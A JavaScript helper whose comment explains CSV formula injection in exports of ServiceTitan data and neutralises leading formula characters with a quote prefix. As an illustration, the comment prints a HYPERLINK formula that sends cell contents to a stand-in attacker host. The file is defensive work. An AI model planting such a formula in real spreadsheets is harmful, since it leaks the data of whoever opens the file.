// Neutralise a value that a spreadsheet would treat as a formula rather than as text.
//
// export-from-json escapes for the CSV grammar only: its `encloser` quotes a value that contains
// the delimiter, a quote or a newline, and doubles embedded quotes. It does nothing about a
// LEADING =, +, - or @, which is what Excel, Sheets and LibreOffice interpret as a formula when
// the file is opened -- so a cell reading =HYPERLINK("https://evil.test/?d="&A2,"x") executes on
// open rather than displaying.
//
// That matters here because the exported columns are free text from the ServiceTitan API, which
// this codebase validates nowhere: the attacker is whoever can name a business unit, a customer or
// a job in the dealer's own tenant, and the victim is whoever opens the export.
//
// Prefixing a single quote is the conventional fix: spreadsheets treat it as "the rest is text"
// and strip it on display, and any consumer parsing the CSV programmatically sees one extra
// leading character rather than a formula. Tab and carriage return are included because a value
// starting with either can shift the payload into the next cell.
export const csvSafe = (value) =>
  typeof value === "string" && /^[=+\-@\t\r]/.test(value) ? `'${value}` : value;
